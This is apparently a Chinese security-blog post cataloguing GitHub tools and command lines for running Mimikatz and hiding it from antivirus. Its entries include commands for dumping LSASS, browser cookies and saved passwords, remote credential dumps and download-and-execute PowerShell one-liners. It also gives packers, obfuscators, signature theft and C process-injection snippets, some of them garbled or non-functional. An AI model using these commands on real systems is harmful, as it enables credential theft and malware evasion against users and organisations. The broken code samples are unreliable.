免责声明
(资料图片)
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
文章正文
go-mimikatz12
go build./go-mimikatz
https://github.com/vyrus001/go-mimikatz
Rusty Mimikatz12 cargo build --release./target/release/mimikatz-rs
https://github.com/memN0ps/mimikatz-rs
MimikatzFUD1
.\Invoke-M1m1fud2.ps1
https://github.com/HernanRodriguez1/MimikatzFUD
pypykatz1234 pip install -r requirements.txtpython pypykatz.pypython pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswordspython pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name="lsass.exe"" sekurlsa::logonpasswords
https://github.com/skelsec/pypykatz
BetterSafetyKatz1234
.\BetterSafetyKatz.exe --DumpCreds.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
https://github.com/Flangvik/BetterSafetyKatz
CopyCat1234 .\CopyCat.exe --dump --local.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"
https://github.com/mobdk/CopyCat
PyFuscation1
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
https://github.com/CBHue/PyFuscation
Invoke-Cats123 Invoke-Cats -pwds Invoke-Cats -certs Invoke-Cats -CustomCommand
https://github.com/DanMcInerney/Invoke-Cats
WinBoost1
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
https://github.com/mobdk/WinBoost
mimidogz1 .\Invoke-Mimidogz.ps1
https://github.com/fir3d0g/mimidogz
CoreClass12
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".
https://github.com/mobdk/CoreClass
SharpMimikatz1 SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
https://github.com/XTeam-Wing/SharpMimikatz
Invoke-Obfuscation123
Set-ExecutionPolicy UnrestrictedImport-Module .\Invoke-Obfuscation.psd1Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command All
https://github.com/danielbohannon/Invoke-Obfuscation
SimpleMimikatzObfuscator1 Commands.txt
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
ClickOnceKatz1234
pip install pycryptodome requestspython build.pyHost the "publish" directory on a web server or file share accessible to the target machine.On the target machine, navigate to the URL of the ClickOnce package in a web browser.
https://github.com/sinmygit/ClickOnceKatz
pymemimporter123456789101112 import base64import pymemimporter# Load the base64-encoded module into memoryencoded_module = b"YOUR_BASE64_ENCODED_MODULE_HERE"module_data = base64.b64decode(encoded_module)# Import the module from memorymem_importer = pymemimporter.PyMemImporter()loaded_module = mem_importer.load_module("", module_data)base64 -w0 .py > .base64python <script_name>.py
https://github.com/n1nj4sec/pymemimporter
SharpDPAPI123
dotnet run --project .\SharpDPAPI\SharpDPAPI.csprojdotnet run --project .\SharpDPAPI\SharpDPAPI.csproj masterkeysdotnet run --project .\SharpDPAPI\SharpDPAPI.csproj domainbackupkeys
https://github.com/GhostPack/SharpDPAPI
Plog123 privilege::debugsekurlsa::Plog
https://github.com/GamehunterKaan/Plog
StegoKatz12
.\StegoKatz.ps1 -Embed -FilePath -ImagePath -OutputPath .\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt
https://github.com/r13mann/StegoKatz
LoadMimikatzWithDinvoke.cs12 mimi.bat.\rundll32-hijack.ps1
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
mimikatz-bypass123
Invoke-WebRequest /corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1Set-ExecutionPolicy Unrestricted.\mimikatz-bypass.ps1
https://github.com/corneacristian/mimikatz-bypass
Utils12 dotnet build -r win10-x64katz.exe
https://github.com/ITh4cker/Utils
Eyeworm12
python3 eyeworm.py -t -c -o python3 eyeworm.py -i -p -o
https://github.com/imsellbaox/Eyeworm
drunkenkatz1 beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"
https://github.com/ap3r/drunkenkatz
CallBack1
python3 CallBack.py -i -p
https://github.com/mobdk/CallBack
mimikatz-byPass-Huorong1 python mimikatz_byPass_Huorong.py
https://github.com/q1ya/mimikatz-byPass-Huorong
mimikatz_bypass1
python mimikatz_bypass.py
https://github.com/wangfly-me/mimikatz_bypass
HTML-mimikatz-1 cmd.exe mimikatz.html
https://github.com/vipserver/HTML-mimikatz-
Mimikatz.exe-in-JS1
cmd.exe mimikatz.js
https://github.com/hardw00t/Mimikatz.exe-in-JS
-Have-You-Seen-These-Katz-12345678910111213 sed -i -e "s/Invoke-Mimikatz/Invoke-Mimidogz/g" Invoke-Mimikatz.ps1sed -i -e "/<#/,/#>/c\\" Invoke-Mimikatz.ps1sed -i -e "s/^[[:space:]]*#.*$//g" Invoke-Mimikatz.ps1sed -i -e "s/DumpCreds/DumpCred/g" Invoke-Mimikatz.ps1sed -i -e "s/ArgumentPtr/NotTodayPal/g" Invoke-Mimikatz.ps1sed -i -e "s/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g" Invoke-Mimikatz.ps1sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
MimiRunner1
rundll32 *.log,#1
https://github.com/mobdk/MimiRunner
Mimikatz-PE-Injection1234567 powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/Dopn98","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.**** In the above command "/out:katz.exe katz.cs" the "katz.cs" should be the path where initially powershell downloads the CS file ***powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \\share_ip\share_name\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile("/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a","katz.cs"); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\\katz.log && cd %temp% && del %temp%\\katz.cs
https://github.com/analyticsearch/Mimikatz-PE-Injection
ninifox1
.\Invoke-NiNifox.ps1
https://github.com/scottjosh/ninifox
Chexport12345 dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect``dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect``dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
https://github.com/GamehunterKaan/Chexport
mimik1234
mimikatz.exemprotected.exemprotected.jpg.exemprotected.jpg.7z
https://github.com/MisterLobster22/mimik
my-obfuscated-mimikatz1 eric.ps1
https://github.com/lazaars/my-obfuscated-mimikatz
Invoke-Mimikatz-W101
.\Invoke-Mimikatz.ps1
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
MimiVader1 python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py
https://github.com/lawja/MimiVader
Invoke-Mimikatz1
.\Invoke-Mimikatz
https://github.com/syn-ack-zack/Invoke-Mimikatz
Invoke-Mimikatz1 .\invokemimikatz.ps1
https://github.com/dfirdeferred/Invoke-Mimikatz
mimikatz_bypass12
.\XInvoke-Mimikatz.ps1.\wi10_Invoke-Mimikatz.ps1
https://github.com/izj007/mimikatz_bypass
JS_MimiKatzDropper1 cscript.exe dropper.js
https://github.com/leinn32/JS_MimiKatzDropper
mimicats1
Invoke-Expression (New-Object Net.Webclient).downloadstring("/Moon1705/mimicats/master/Mimicats.ps1") Invoke-Cats -Command ""privilege::debug""
https://github.com/Moon1705/mimicats
XorPacker1 python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
https://github.com/tmenochet/XorPacker
PEzor1
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p ""coffee" "sleep 5000" "coffee" "exit""
https://github.com/phra/PEzor
AtomPePacker1 PePacker.exe mimikatz.exe -e
https://github.com/NUL0x4C/AtomPePacker
Nim-RunPE1
nim c -d:args NimRunPE.nim
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
Nimcrypt212 nim c -d:release nimcrypt2.nim./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt
https://github.com/icyguider/Nimcrypt2
ProtectMyTooling1
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
https://github.com/mgeeky/ProtectMyTooling
xencrypt12 Import-Module ./xencrypt.ps1 Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
https://github.com/the-xentropy/xencrypt
BetterXencrypt12
Import-Module ./betterxencrypt.ps1 Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
https://github.com/GetRektBoy724/BetterXencrypt
AES-Encoder12 Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1
https://github.com/Chainski/AES-Encoder
mortar12
./encryptor -f mimikatz.exe -o bin.encdeliver.exe -d -c sekurlsa::logonpasswords -f bin.enc
https://github.com/0xsp-SRD/mortar
.NET-Crypter12 Browse Executable:Generate Encryption:
https://github.com/roast247/.NET-Crypter
Custom mods + Invoke-Obfuscation1234567891011121314
sed- e "/<#/,/#>/c\\" "$1"sed"s/^[[: space: ]]*#.*$//g" "$1"- esed"s/Invoke-Mimikatz/RainbowsAndUnicorns/g" "$1"- eT"Tsed-e"s/DumpCreds/MoreRainbows/g" "$1"Invoke-Obfuscation -ScriptPath "./Invoke-Mimikatz.ps1’ -Command "Token\All\1\Out full_power.ps1’ -QuietInvoke-Obfuscation -ScriptPath ".\2.IM_critical_words.ps1" -Command "Token\Variable\1’ -Quiet > final.ps1IEX (New-object Net. Webclient) .Downloadstring("http: //192.168.1.104:8000/final.ps1") ; RainbowsAndUnicorns -MoreRainbows
https://github.com/newlog/fud_mimikatz_talk
Obfuscated_Invoke-Mimikatz12345678 sed -i -e "s/Invoke-Mimikatz/Invoke-LSASSscraper/g" Invoke-Mimikatz.ps1sed -i -e "/<#/,/#>/c\\" Invoke-Mimikatz.ps1sed -i -e "s/^[[:space:]]*#.*$//g" Invoke-Mimikatz.ps1sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions#\-/g" Invoke-Mimikatz.ps1 Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –Force Import-Module .\obfuscat_Invoke-Mimikatz.ps1 Invoke-LSASSscraper
https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz
mimikatz_encoded1
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/mobx26/mimikatz_encoded
Encrypted_Mimikatz12 .\decrypt.ps1.\mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/Sombody101/Encrypted_Mimikatz
SigThief1
sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe
https://github.com/secretsquirrel/SigThief
memory+suspended123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354 #include #include const char* cmd = "powershell.exe -windowstyle hidden -command \"IEX (New-Object Net.WebClient).DownloadString("/gentilkiwi/mimikatz/master/mimikatz.ps1"); Invoke-Mimikatz -DumpCreds\"";void obfuscate(char* str){ int len = strlen(str); for (int i = 0; i < len; i++) { str[i] = str[i] ^ 0x41; }}int main(){ char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK\""; obfuscate(encoded_cmd); DWORD pid = GetCurrentProcessId(); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (process == NULL) { printf("Error opening process. Error code: %lu\n", GetLastError()); return 1; } LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE); if (remote_string == NULL) { printf("Error allocating memory. Error code: %lu\n", GetLastError()); CloseHandle(process); return 1; } BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL); if (!write_result) { printf("Error writing to process memory. Error code: %lu\n", GetLastError()); CloseHandle(process); return 1; } HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL); if (thread == NULL) { printf("Error creating remote thread. Error code: %lu\n", GetLastError()); CloseHandle(process); return 1; } WaitForSingleObject(thread, INFINITE); VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE); CloseHandle(process); return 0;}
XOR’d with 0xFF1234567891011121314151617181920212223242526272829303132
#include #include using namespace std;void obfuscate(char* s) { for (int i = 0; s[i]; i++) { s[i] = s[i] ^ 0xFF; }}int main() { char* str = new char[20]; strcpy(str, "password123"); // Obfuscate the string obfuscate(str); // Print the obfuscated string cout << str << endl; // Restore the original string obfuscate(str); // Print the original string cout << str << endl; delete[] str; return 0;}
XORing each character with the value 0xAA12345678910111213141516171819202122232425262728293031323334353637 #include #include #include int main(){ char str1[] = "mimikatz.exe"; char str2[] = "powershell.exe"; char str3[] = "cmd.exe /c mimikatz.exe"; int len1 = strlen(str1); int len2 = strlen(str2); int len3 = strlen(str3); for(int i = 0; i < len1; i++) { str1[i] = str1[i] ^ 0xAA; } for(int i = 0; i < len2; i++) { str2[i] = str2[i] ^ 0xAA; } for(int i = 0; i < len3; i++) { str3[i] = str3[i] ^ 0xAA; } void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(mem, str1, sizeof(str1)); memcpy((char*)mem + sizeof(str1), str2, sizeof(str2)); memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3)); ((void(*)())mem)(); return 0;}
Decoding and storing it in memory12345678910111213141516171819202122232425
#include #include int main(){ const char* encodedCmd = "\x44\x43\x4D\x53\x63\x72\x61\x70\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x62\x00\x2D\x6E\x6F\x70\x23\x00\x2D\x6E\x6F\x70\x69\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x77\x00\x2D\x70\x00\x2D\x65\x00\x2D\x74\x00\x2D\x72\x00\x2D\x75\x00\x2D\x6E\x00\x20\x22\x26\x28\x2A\x2C\x2E\x30\x32\x34\x36\x38\x3A\x3C\x3E\x40\x42\x44\x46\x48\x4A\x4C\x4E\x50\x52\x54\x56\x58\x5A\x5C\x5E\x60\x62\x64\x66\x68\x6A\x6C\x6E\x70\x72\x74\x76\x78\x7A\x7C\x7E\x80\x82\x84\x86\x88\x8A\x8C\x8E\x90\x92\x94\x96\x98\x9A\x9C\x9E\xA0\xA2\xA4\xA6\xA8\xAA\xAC\xAE\xB0\xB2\xB4\xB6\xB8\xBA\xBC\xBE\xC0\xC2\xC4\xC6\xC8\xCA\xCC\xCE\xD0\xD2\xD4\xD6\xD8\xDA\xDC\xDE\xE0\xE2\xE4\xE6\xE8\xEA\xEC\xEE\xF0\xF2\xF4\xF6\xF8\xFA\xFC\xFE\x00\x22"; DWORD pid; HWND hwnd = FindWindowA(NULL, "Window Name"); GetWindowThreadProcessId(hwnd, &pid); HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL); HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL); CloseHandle(hThread); CloseHandle(hProc); return 0;}
Inject and execute Mimikatz in memory123456789101112131415161718192021222324252627282930313233343536 #include #include #include #include #define MIMIKATZ_PATH "C:\\path\\to\\mimikatz.exe"int main(){ // Load Mimikatz into memory HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); DWORD dwFileSize = GetFileSize(hFile, NULL); BYTE* pbFileData = (BYTE*)malloc(dwFileSize); DWORD dwBytesRead; ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL); CloseHandle(hFile); // Allocate memory for Mimikatz LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // Copy Mimikatz to allocated memory memcpy(lpMem, pbFileData, dwFileSize); // Execute Mimikatz DWORD dwExitCode; DWORD dwThreadId; HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId); WaitForSingleObject(hThread, INFINITE); GetExitCodeThread(hThread, &dwExitCode); // Free allocated memory VirtualFree(lpMem, 0, MEM_RELEASE); return 0;}
技术交流
知识星球
涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 200+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。
交流群
上一篇:枣庄严查货车超限超载运输 15辆货车被查处_环球热点
下一篇:最后一页
X 关闭